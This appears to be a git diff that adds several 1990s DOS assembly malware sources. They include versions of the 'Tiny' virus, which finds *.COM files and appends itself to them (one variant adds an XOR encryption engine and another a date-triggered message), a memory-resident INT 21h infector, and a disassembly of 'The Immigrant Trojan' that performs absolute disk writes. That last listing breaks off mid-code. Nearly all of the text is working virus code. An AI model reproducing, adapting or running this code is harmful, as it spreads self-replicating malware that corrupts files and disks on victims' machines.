stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov cl,4 ; Overwrite the first 4 bytes of the file
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,102 @@
|
|||
PAGE ,132
|
||||
tinyv SEGMENT BYTE PUBLIC 'code'
|
||||
ASSUME CS:tinyv
|
||||
ASSUME SS:tinyv
|
||||
ASSUME DS:tinyv
|
||||
H00000 DB 0
|
||||
H00001 DB 255 DUP(?)
|
||||
program PROC FAR
|
||||
ASSUME ES:tinyv
|
||||
begin:
|
||||
JMP pgstart ; start program
|
||||
exlbl LABEL BYTE
|
||||
db 0CDh, 20h, 7, 8, 9
|
||||
pgstart:
|
||||
CALL tinyvir
|
||||
mnprg PROC NEAR
|
||||
tinyvir:
|
||||
POP SI ; get SI for storage
|
||||
SUB SI,offset tinyvir ; reset SI to virus start
|
||||
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
||||
ADD BP,offset exlbl ; Add to get original offset
|
||||
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
||||
SUB CX,CX ; || (clear regs)
|
||||
MOV AH,4EH ; || (find files)
|
||||
mainloop: ; \||/
|
||||
INT 21H ; ----\/----
|
||||
JC ack ; no more files found, terminate virus
|
||||
MOV DX,009EH ; set file name pointer
|
||||
MOV AX,3D02H ; open file
|
||||
INT 21H ; do it!
|
||||
MOV BX,AX ; move file handle to BX
|
||||
MOV AH,3FH ; read file
|
||||
JMP whatever
|
||||
ack:
|
||||
JMP nofile
|
||||
whatever:
|
||||
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
||||
MOV DI,DX ; set Dest Index to area for buffer (?)
|
||||
MOV CX,0003H ; read 3 bytes
|
||||
INT 21H ; do it!
|
||||
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
||||
JE infect ; If begins w/JMP, Infect
|
||||
nextfile:
|
||||
MOV AH,4FH ; set int 21 to find next file
|
||||
JMP mainloop ; next file, do it!
|
||||
infect:
|
||||
MOV DX,[DI+01H] ; set # of bytes to move
|
||||
MOV [SI+blnkdat],DX ; " " " " " "
|
||||
SUB CX,CX ; " " " " " " (0 here)
|
||||
NOP
|
||||
MOV AX,4200H ; move file
|
||||
INT 21H ; do it!
|
||||
MOV DX,DI ; set dest index to area for buffer (?)
|
||||
MOV CX,0002H ; two bytes
|
||||
NOP
|
||||
MOV AH,3FH ; read file
|
||||
INT 21H ; do it!
|
||||
CMP WORD PTR [DI],0807H ; check for infection
|
||||
JE nextfile ; next file if infected
|
||||
NOP
|
||||
SUB DX,DX ; clear regs
|
||||
SUB CX,CX ; " "
|
||||
MOV AX,4202H ; move file pointer
|
||||
INT 21H ; do it!
|
||||
CMP DX,00H ; new pointer location 0?
|
||||
NOP
|
||||
JNE nextfile ; if no then next file
|
||||
CMP AH,0FEH ; new pointer loc too high?
|
||||
JNC nextfile ; yes, try again
|
||||
MOV [SI+offset endprog+3],AX; point to data
|
||||
NOP
|
||||
MOV AH,40H ; write instruction
|
||||
LEA DX,[SI+0105H] ; write buffer loc |
|
||||
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
||||
INT 21H ; do it!
|
||||
JC exit ; error, bug out
|
||||
MOV AX,4200H ; move pointer
|
||||
NOP
|
||||
SUB CX,CX ; clear reg
|
||||
MOV DX,OFFSET H00001 ; where to set pointer
|
||||
NOP
|
||||
INT 21H ; do it!
|
||||
MOV AH,40H ; write to file
|
||||
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
|
||||
NOP
|
||||
MOV CX,0002H ; two bytes (the JMP)
|
||||
INT 21H ; do it!
|
||||
exit:
|
||||
MOV AH,3EH ; close file
|
||||
INT 21H ; do it!
|
||||
nofile:
|
||||
JMP BP ; go to original file
|
||||
mnprg ENDP
|
||||
program ENDP
|
||||
blnkdat LABEL WORD
|
||||
DW 0000H
|
||||
fspec LABEL WORD
|
||||
DB '*.COM'
|
||||
DB 0
|
||||
endprog LABEL WORD
|
||||
tinyv ENDS
|
||||
END program
|
|
@ -0,0 +1,101 @@
|
|||
PAGE ,132
|
||||
tinyv SEGMENT BYTE PUBLIC 'code'
|
||||
ASSUME CS:tinyv
|
||||
ASSUME SS:tinyv
|
||||
ASSUME DS:tinyv
|
||||
H00000 DB 0
|
||||
H00001 DB 255 DUP(?)
|
||||
program PROC FAR
|
||||
ASSUME ES:tinyv
|
||||
begin:
|
||||
JMP pgstart ; start program
|
||||
exlbl LABEL BYTE
|
||||
db 0CDh, 20h, 7, 8, 9
|
||||
pgstart:
|
||||
CALL tinyvir
|
||||
mnprg PROC NEAR
|
||||
tinyvir:
|
||||
POP SI ; get SI for storage
|
||||
SUB SI,offset tinyvir ; reset SI to virus start
|
||||
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
||||
ADD BP,offset exlbl ; Add to get original offset
|
||||
|
||||
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
||||
SUB CX,CX ; || (clear regs)
|
||||
MOV AH,4EH ; || (find files)
|
||||
mainloop: ; \||/
|
||||
INT 21H ; ----\/----
|
||||
JC hiccup ; no more files found, terminate virus
|
||||
MOV DX,009EH ; set file name pointer
|
||||
MOV AX,3D02H ; open file
|
||||
INT 21H ; do it!
|
||||
MOV BX,AX ; move file handle to BX
|
||||
MOV AH,3FH ; read file
|
||||
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
||||
MOV DI,DX ; set Dest Index to area for buffer (?)
|
||||
MOV CX,0003H ; read 3 bytes
|
||||
INT 21H ; do it!
|
||||
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
||||
JE infect ; If begins w/JMP, Infect
|
||||
nextfile:
|
||||
MOV AH,4FH ; set int 21 to find next file
|
||||
JMP mainloop ; next file, do it!
|
||||
hiccup: JMP nofile
|
||||
infect:
|
||||
MOV AX,5700h ; get date function
|
||||
INT 21h ; do it!
|
||||
PUSH DX ; store date + time
|
||||
PUSH CX
|
||||
MOV DX,[DI+01H] ; set # of bytes to move
|
||||
MOV [SI+blnkdat],DX ; " " " " " "
|
||||
SUB CX,CX ; " " " " " " (0 here)
|
||||
MOV AX,4200H ; move file
|
||||
INT 21H ; do it!
|
||||
MOV DX,DI ; set dest index to area for buffer (?)
|
||||
MOV CX,0002H ; two bytes
|
||||
MOV AH,3FH ; read file
|
||||
INT 21H ; do it!
|
||||
CMP WORD PTR [DI],0807H ; check for infection
|
||||
JE nextfile ; next file if infected
|
||||
SUB DX,DX ; clear regs
|
||||
SUB CX,CX ; " "
|
||||
MOV AX,4202H ; move file pointer
|
||||
INT 21H ; do it!
|
||||
CMP DX,00H ; new pointer location 0?
|
||||
JNE nextfile ; if no then next file
|
||||
CMP AH,0FEH ; new pointer loc too high?
|
||||
JNC nextfile ; yes, try again
|
||||
MOV [SI+offset endprog+3],AX; point to data
|
||||
MOV AH,40H ; write instruction
|
||||
LEA DX,[SI+0105H] ; write buffer loc |
|
||||
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
||||
INT 21H ; do it!
|
||||
JC exit ; error, bug out
|
||||
MOV AX,4200H ; move pointer
|
||||
SUB CX,CX ; clear reg
|
||||
MOV DX,OFFSET H00001 ; where to set pointer
|
||||
INT 21H ; do it!
|
||||
MOV AH,40H ; write to file
|
||||
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
|
||||
MOV CX,0002H ; two bytes (the JMP)
|
||||
INT 21H ; do it!
|
||||
MOV AX,5701h ; store date
|
||||
POP CX ; restore time
|
||||
POP DX ; restore date
|
||||
INT 21h ; do it!
|
||||
exit:
|
||||
MOV AH,3EH ; close file
|
||||
INT 21H ; do it!
|
||||
nofile:
|
||||
|
||||
JMP BP ; go to original file
|
||||
mnprg ENDP
|
||||
program ENDP
|
||||
blnkdat LABEL WORD
|
||||
DW 0000H
|
||||
fspec LABEL WORD
|
||||
DB '*.COM'
|
||||
DB 0
|
||||
endprog LABEL WORD
|
||||
tinyv ENDS
|
||||
END program
|
|
@ -0,0 +1,182 @@
|
|||
tinyv SEGMENT BYTE PUBLIC 'code'
|
||||
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
|
||||
|
||||
ORG 100h
|
||||
|
||||
DOS EQU 21h
|
||||
|
||||
start: JMP pgstart
|
||||
exlbl: db 0CDh, 20h, 7, 8, 9
|
||||
pgstart:CALL tinyvir
|
||||
tinyvir:
|
||||
POP SI ; get SI for storage
|
||||
SUB SI,offset tinyvir ; reset SI to virus start
|
||||
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
||||
ADD BP, OFFSET exlbl
|
||||
CALL endecrpt
|
||||
JMP SHORT realprog
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; nonencrypted subroutines start here
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
; PCM's encryption was stupid, mine is better - Dark Angel
|
||||
endecrpt:
|
||||
; Only need to save necessary registers - Dark Angel
|
||||
PUSH AX ; store registers
|
||||
PUSH BX
|
||||
PUSH CX
|
||||
PUSH SI
|
||||
; New, better, more compact encryption engine
|
||||
MOV BX, [SI+EN_VAL]
|
||||
ADD SI, offset realprog
|
||||
MOV CX, endenc - realprog
|
||||
SHR CX, 1
|
||||
JNC start_encryption
|
||||
DEC SI
|
||||
start_encryption:
|
||||
MOV DI, SI
|
||||
encloop:
|
||||
LODSW ; DS:[SI] -> AX
|
||||
XOR AX, BX
|
||||
STOSW
|
||||
LOOP encloop
|
||||
|
||||
POP SI ; restore registers
|
||||
POP CX
|
||||
POP BX
|
||||
POP AX
|
||||
RET
|
||||
;-----end of encryption routine
|
||||
nfect:
|
||||
CALL endecrpt
|
||||
MOV [SI+offset endprog+3],AX; point to data
|
||||
MOV AH,40H ; write instruction
|
||||
LEA DX,[SI+0105H] ; write buffer loc |
|
||||
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
||||
INT DOS ; do it!
|
||||
PUSHF
|
||||
CALL endecrpt
|
||||
POPF
|
||||
JC outa1 ; error, bug out
|
||||
RET
|
||||
outa1:
|
||||
JMP exit
|
||||
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Unencrypted routines end here
|
||||
;-----------------------------------------------------------------------------
|
||||
realprog:
|
||||
CLD ; forward direction for string ops
|
||||
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
|
||||
; Instead, set DTA to SI+ENDPROG+131h
|
||||
MOV AH, 1Ah ; Set DTA
|
||||
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
|
||||
INT 21h
|
||||
|
||||
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
||||
XOR CX, CX ; || (clear regs)
|
||||
MOV AH,4EH ; || (find files)
|
||||
mainloop: ; \||/
|
||||
INT DOS ; ----\/----
|
||||
JC hiccup ; no more files found, terminate virus
|
||||
; Next part had to be changed to account for new DTA address - Dark Angel
|
||||
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
|
||||
; (offset 30 is DTA filename start)
|
||||
MOV AX,3D02H ; open file
|
||||
INT DOS ; do it!
|
||||
MOV BX,AX ; move file handle to BX
|
||||
MOV AH,3FH ; read file
|
||||
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
||||
MOV DI,DX ; set Dest Index to area for buffer
|
||||
MOV CX,0003H ; read 3 bytes
|
||||
INT DOS ; do it!
|
||||
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
||||
JE infect ; If begins w/JMP, Infect
|
||||
nextfile:
|
||||
MOV AH,4FH ; set int 21 to find next file
|
||||
JMP mainloop ; next file, do it!
|
||||
hiccup: JMP exit
|
||||
infect:
|
||||
MOV AX,5700h ; get date function
|
||||
INT DOS ; do it!
|
||||
PUSH DX ; store date + time
|
||||
PUSH CX
|
||||
MOV DX,[DI+01H] ; set # of bytes to move
|
||||
MOV [SI+blnkdat],DX ; " " " " " "
|
||||
; Tighter Code here - Dark Angel
|
||||
XOR CX,CX ; " " " " " " (0 here)
|
||||
MOV AX,4200H ; move file
|
||||
INT DOS ; do it!
|
||||
MOV DX,DI ; set dest index to area for buffer
|
||||
MOV CX,0002H ; two bytes
|
||||
MOV AH,3FH ; read file
|
||||
INT DOS ; do it!
|
||||
CMP WORD PTR [DI],0807H ; check for infection
|
||||
JE nextfile ; next file if infected
|
||||
getaval: ; encryption routine starts here
|
||||
; My modifications here - Dark Angel
|
||||
MOV AH, 2Ch ; DOS get TIME function
|
||||
INT DOS ; do it!
|
||||
OR DX, DX ; Is it 0?
|
||||
JE getaval ; yeah, try again
|
||||
MOV word ptr [si+offset en_val], DX ; Store it
|
||||
; Tighter code here - Dark Angel
|
||||
XOR DX,DX ; clear regs
|
||||
XOR CX,CX ; " "
|
||||
MOV AX,4202H ; move file pointer
|
||||
INT DOS ; do it!
|
||||
OR DX,DX ; new pointer location 0?
|
||||
JNE nextfile ; if no then next file
|
||||
CMP AH,0FEH ; new pointer loc too high?
|
||||
JNC nextfile ; yes, try again
|
||||
CALL nfect
|
||||
MOV AX,4200H ; move pointer
|
||||
XOR CX, CX ; clear reg
|
||||
MOV DX,OFFSET 00001 ; where to set pointer
|
||||
INT DOS ; do it!
|
||||
MOV AH,40H ; write to file
|
||||
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
|
||||
MOV CX,0002H ; two bytes (the JMP)
|
||||
INT DOS ; do it!
|
||||
MOV AX,5701h ; store date
|
||||
POP CX ; restore time
|
||||
POP DX ; restore date
|
||||
INT DOS ; do it!
|
||||
exit:
|
||||
MOV AH,3EH ; close file
|
||||
INT DOS ; do it!
|
||||
|
||||
; Return DTA to old position - Dark Angel
|
||||
|
||||
MOV AH, 1Ah ; Set DTA
|
||||
MOV DX, 80h ; to PSP DTA
|
||||
INT 21h
|
||||
|
||||
JMP BP
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; encrypted data goes here
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
fspec LABEL WORD
|
||||
DB '*.COM',0
|
||||
nondata DB 'Tiny-F version 1.1' ; Program identification
|
||||
DB '˜€×@&î·³½ë' ; author identification
|
||||
DB 'Released 10-19-91' ; release date
|
||||
endenc LABEL BYTE ; end of encryption zone
|
||||
;-----------------------------------------------------------------------------
|
||||
; nonencrypted data goes anywhere after here
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
blnkdat LABEL WORD
|
||||
DW 0000H
|
||||
|
||||
; Only en_val is needed now because of new encryption mechanism
|
||||
en_val DW 0h
|
||||
|
||||
endprog LABEL WORD
|
||||
tinyv ENDS
|
||||
END start
|
||||
|
|
@ -0,0 +1,120 @@
|
|||
|
||||
PAGE 59,132
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ S ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Created: 4-Aug-90 ÛÛ
|
||||
;ÛÛ Version: ÛÛ
|
||||
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
data_2e equ 1ABh ; (946E:01AB=0)
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
s proc far
|
||||
|
||||
start:
|
||||
jmp loc_1 ; (0108)
|
||||
db 0CDh, 20h, 7, 8, 9
|
||||
loc_1:
|
||||
call sub_1 ; (010B)
|
||||
|
||||
s endp
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_1 proc near
|
||||
pop si
|
||||
sub si,10Bh
|
||||
mov bp,data_1[si] ; (946E:01A0=0)
|
||||
add bp,103h
|
||||
lea dx,[si+1A2h] ; Load effective addr
|
||||
xor cx,cx ; Zero register
|
||||
mov ah,4Eh ; 'N'
|
||||
loc_2:
|
||||
int 21h ; DOS Services ah=function 4Eh
|
||||
; find 1st filenam match @ds:dx
|
||||
jc loc_6 ; Jump if carry Set
|
||||
mov dx,9Eh
|
||||
mov ax,3D02h
|
||||
int 21h ; DOS Services ah=function 3Dh
|
||||
; open file, al=mode,name@ds:dx
|
||||
mov bx,ax
|
||||
mov ah,3Fh ; '?'
|
||||
lea dx,[si+1A8h] ; Load effective addr
|
||||
mov di,dx
|
||||
mov cx,3
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
cmp byte ptr [di],0E9h
|
||||
je loc_4 ; Jump if equal
|
||||
loc_3:
|
||||
mov ah,4Fh ; 'O'
|
||||
jmp short loc_2 ; (0120)
|
||||
loc_4:
|
||||
mov dx,[di+1]
|
||||
mov data_1[si],dx ; (946E:01A0=0)
|
||||
xor cx,cx ; Zero register
|
||||
mov ax,4200h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov dx,di
|
||||
mov cx,2
|
||||
mov ah,3Fh ; '?'
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
cmp word ptr [di],807h
|
||||
je loc_3 ; Jump if equal
|
||||
xor dx,dx ; Zero register
|
||||
xor cx,cx ; Zero register
|
||||
mov ax,4202h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
cmp dx,0
|
||||
jne loc_3 ; Jump if not equal
|
||||
cmp ah,0FEh
|
||||
jae loc_3 ; Jump if above or =
|
||||
mov ds:data_2e[si],ax ; (946E:01AB=0)
|
||||
mov ah,40h ; '@'
|
||||
lea dx,[si+105h] ; Load effective addr
|
||||
mov cx,0A3h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
jc loc_5 ; Jump if carry Set
|
||||
mov ax,4200h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,1
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov ah,40h ; '@'
|
||||
lea dx,[si+1ABh] ; Load effective addr
|
||||
mov cx,2
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
loc_5:
|
||||
mov ah,3Eh ; '>'
|
||||
int 21h ; DOS Services ah=function 3Eh
|
||||
; close file, bx=file handle
|
||||
loc_6:
|
||||
jmp bp ;*Register jump
|
||||
data_1 dw 0 ; Data table (indexed access)
|
||||
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
|
||||
sub_1 endp
|
||||
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
|
|
@ -0,0 +1,94 @@
|
|||
VSize=085h
|
||||
|
||||
Code Segment
|
||||
Assume CS:Code
|
||||
org 0
|
||||
db 4Dh
|
||||
jmp Start
|
||||
|
||||
Org 600h
|
||||
|
||||
Bytes db 0CDh,20h,90h,90h
|
||||
|
||||
Start: mov si, 0100h
|
||||
mov bx, offset Int21
|
||||
mov cx, 0050h
|
||||
mov di, si
|
||||
add si, [si+2]
|
||||
push di
|
||||
movsw
|
||||
movsw
|
||||
mov es, cx
|
||||
cmpsb
|
||||
je StartFile
|
||||
dec si
|
||||
dec di
|
||||
rep movsw
|
||||
mov es, cx
|
||||
xchg ax, bx
|
||||
xchg ax, cx
|
||||
Loop0: xchg ax, cx
|
||||
xchg ax, word ptr es:[di-120h]
|
||||
stosw
|
||||
jcxz Loop0
|
||||
xchg ax, bx
|
||||
StartFile:
|
||||
push ds
|
||||
pop es
|
||||
ret
|
||||
|
||||
Int21: cmp ax, 4B00h
|
||||
jne End21
|
||||
Exec: push ax
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
mov ax, 3D02h
|
||||
call DoInt21
|
||||
jc EndExec
|
||||
cbw ;Zero AH
|
||||
cwd ;Zero DX
|
||||
mov bx, si ;Move handle to BX
|
||||
mov ds, ax ;Set DS and ES to 60h,
|
||||
mov es, ax ;the virus data segment
|
||||
mov ah, 3Fh ;Read first 4 bytes
|
||||
int 69h
|
||||
mov al, 4Dh
|
||||
scasb ;Check for 4D5Ah or infected file mark
|
||||
je Close ;.EXE or already infected
|
||||
mov al, 2
|
||||
call LSeek ;Seek to the end, SI now contains file size
|
||||
mov cl, VSize ;Virus size in CX, prepare to write
|
||||
int 69h ;AH is 40h, i.e. Write operation
|
||||
mov ax, 0E94Dh ;Virus header in AX
|
||||
stosw ;Store it
|
||||
xchg ax, si ;Move file size in AX
|
||||
stosw ;Complete JMP instruction
|
||||
xchg ax, dx ;Zero AX
|
||||
call LSeek ;Seek to the beginning
|
||||
int 69h ;AH is 40h, write the virus header
|
||||
Close: mov ah,3Eh ;Close the file
|
||||
int 69h
|
||||
EndExec: pop es
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
End21: jmp dword ptr cs:[69h * 4]
|
||||
|
||||
LSeek: mov ah, 42h ;Seek operation
|
||||
cwd ;Zero DX
|
||||
DoInt21: xor cx, cx ;External entry for Open, zero cx
|
||||
int 69h
|
||||
mov cl, 4 ;4 bytes will be read/written
|
||||
xchg ax, si ;Store AX in SI
|
||||
mov ax, 4060h ;Prepare AH for Write
|
||||
xor di, di ;Zero DI
|
||||
ret
|
||||
|
||||
VLen = $ - offset Bytes
|
||||
|
||||
Code EndS
|
||||
End
|
||||
|
|
@ -0,0 +1,116 @@
|
|||
tinyv SEGMENT BYTE PUBLIC 'code'
|
||||
ASSUME CS:tinyv
|
||||
ASSUME SS:tinyv
|
||||
ASSUME DS:tinyv
|
||||
H00000 DB 0
|
||||
H00001 DB 255 DUP(?)
|
||||
program PROC FAR
|
||||
ASSUME ES:tinyv
|
||||
begin:
|
||||
JMP pgstart ; start program
|
||||
exlbl LABEL BYTE
|
||||
db 0CDh, 20h, 7, 8, 9
|
||||
pgstart:
|
||||
CALL tinyvir
|
||||
mnprg PROC NEAR
|
||||
tinyvir:
|
||||
POP SI ; get SI for storage
|
||||
SUB SI,offset tinyvir ; reset SI to virus start
|
||||
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
||||
ADD BP,offset exlbl ; Add to get original offset
|
||||
|
||||
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
||||
SUB CX,CX ; || (clear regs)
|
||||
MOV AH,4EH ; || (find files)
|
||||
mainloop: ; \||/
|
||||
INT 21H ; ----\/----
|
||||
JC hiccup ; no more files found, terminate virus
|
||||
MOV DX,009EH ; set file name pointer
|
||||
MOV AX,3D02H ; open file
|
||||
INT 21H ; do it!
|
||||
MOV BX,AX ; move file handle to BX
|
||||
MOV AH,3FH ; read file
|
||||
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
||||
MOV DI,DX ; set Dest Index to area for buffer (?)
|
||||
MOV CX,0003H ; read 3 bytes
|
||||
INT 21H ; do it!
|
||||
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
||||
JE infect ; If begins w/JMP, Infect
|
||||
nextfile:
|
||||
MOV AH,4FH ; set int 21 to find next file
|
||||
JMP mainloop ; next file, do it!
|
||||
hiccup: JMP nofile
|
||||
infect:
|
||||
MOV AX,5700h ; get date function
|
||||
INT 21h ; do it!
|
||||
PUSH DX ; store date + time
|
||||
PUSH CX
|
||||
MOV DX,[DI+01H] ; set # of bytes to move
|
||||
MOV [SI+blnkdat],DX ; " " " " " "
|
||||
SUB CX,CX ; " " " " " " (0 here)
|
||||
MOV AX,4200H ; move file
|
||||
INT 21H ; do it!
|
||||
MOV DX,DI ; set dest index to area for buffer (?)
|
||||
MOV CX,0002H ; two bytes
|
||||
MOV AH,3FH ; read file
|
||||
INT 21H ; do it!
|
||||
CMP WORD PTR [DI],0807H ; check for infection
|
||||
JE nextfile ; next file if infected
|
||||
SUB DX,DX ; clear regs
|
||||
SUB CX,CX ; " "
|
||||
MOV AX,4202H ; move file pointer
|
||||
INT 21H ; do it!
|
||||
CMP DX,00H ; new pointer location 0?
|
||||
JNE nextfile ; if no then next file
|
||||
CMP AH,0FEH ; new pointer loc too high?
|
||||
JNC nextfile ; yes, try again
|
||||
MOV [SI+offset endprog+3],AX; point to data
|
||||
MOV AH,40H ; write instruction
|
||||
LEA DX,[SI+0105H] ; write buffer loc |
|
||||
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
||||
INT 21H ; do it!
|
||||
JC exit ; error, bug out
|
||||
MOV AX,4200H ; move pointer
|
||||
SUB CX,CX ; clear reg
|
||||
MOV DX,OFFSET H00001 ; where to set pointer
|
||||
INT 21H ; do it!
|
||||
MOV AH,40H ; write to file
|
||||
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
|
||||
MOV CX,0002H ; two bytes (the JMP)
|
||||
INT 21H ; do it!
|
||||
MOV AX,5701h ; store date
|
||||
POP CX ; restore time
|
||||
POP DX ; restore date
|
||||
INT 21h ; do it!
|
||||
exit:
|
||||
MOV AH,2Ah ; date function
|
||||
INT 21h ; do it!
|
||||
CMP AL,0h ; is it sunday?
|
||||
JNE closal ; nope, quit
|
||||
CMP DH,6h ; is it June?
|
||||
JNE closal ; nope, quit
|
||||
PUSH BX
|
||||
PUSH SI
|
||||
MOV AH,9h ; print string
|
||||
MOV DX, OFFSET nondata ; string to print
|
||||
ADD DX,SI
|
||||
INT 21h ; print it
|
||||
MOV DX, OFFSET nondat2 ; next string
|
||||
ADD DX, SI
|
||||
INT 21h ; print it!
|
||||
POP BX
|
||||
closal: MOV AH,3EH ; close file
|
||||
INT 21H ; do it!
|
||||
nofile: JMP BP ; go to original file
|
||||
mnprg ENDP
|
||||
program ENDP
|
||||
blnkdat LABEL WORD
|
||||
DW 0000H
|
||||
fspec LABEL WORD
|
||||
DB '*.COM'
|
||||
DB 0
|
||||
nondata DB 'Tiny-D version 1.1$ '; Program identification
|
||||
nondat2 DB ' by ˜€×@&î·³½ë$' ; author identification
|
||||
endprog LABEL WORD
|
||||
tinyv ENDS
|
||||
END program
|
|
@ -0,0 +1,310 @@
|
|||
ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #1 - YAM '92
|
||||
|
||||
Article Title: The Immigrant Trojan Disassembly
|
||||
Author: Natas Kaupas
|
||||
|
||||
|
||||
;*****************************************************************************
|
||||
; Dissasembly of The Immigrant Trojan (TIT)
|
||||
; Dissasembly by Dark Angel
|
||||
;
|
||||
; Just save this and compile it with TASM.
|
||||
;*****************************************************************************
|
||||
|
||||
PAGE 59,132
|
||||
|
||||
data_6e equ 2000h ; (0010:2000=89h)
|
||||
data_8e equ 0Ch ; (8096:000C=0)
|
||||
data_10e equ 87F8h ; (8096:87F8=0)
|
||||
data_11e equ 0CDF3h ; (8096:CDF3=0)
|
||||
|
||||
; Tasm 1.00 will output an extra NOP (90h) on forward memory references
|
||||
; if the segment is declared after the reference. Segments are declared
|
||||
; prior to any code to allow re-assembly.
|
||||
|
||||
seg_B segment byte public
|
||||
seg_B ends
|
||||
|
||||
seg_C segment byte public
|
||||
seg_C ends
|
||||
|
||||
|
||||
;-------------------------------------------------------------- seg_a ----
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a , ds:seg_a , ss:stack_seg_c
|
||||
|
||||
db 0FDh,0FFh, 00h,0FFh,0F8h, 0Eh
|
||||
db 0B8h, 05h, 00h, 8Eh,0D8h,0BDh
|
||||
db 01h, 00h,0BAh, 0Dh, 00h,0B4h
|
||||
db 0FFh,0FFh
|
||||
db 9
|
||||
db 0CDh, 21h, 80h, 3Eh, 0Ch, 00h
|
||||
db 1Ah, 7Dh, 19h,0B4h, 05h,0B5h
|
||||
db 00h,0B6h, 00h,0E1h, 79h, 8Ah
|
||||
db 16h,0F3h,0CDh, 13h,0BAh, 6Ah
|
||||
db 0E6h,0FEh, 06h,0F8h, 87h,0F3h
|
||||
db 0EBh,0E0h,0B0h, 02h
|
||||
loc_2:
|
||||
mov cx,2BCh
|
||||
mov dx,0FFC9h
|
||||
stc ; Set carry flag
|
||||
mov ds,[di+63h]
|
||||
mov bx,[di+37h]
|
||||
int 26h ; Absolute disk write, drive al
|
||||
mov dx,0E326h
|
||||
mov ax,0F000h
|
||||
dec word ptr [si-5]
|
||||
add [bp+si],al
|
||||
or ax,440Ah
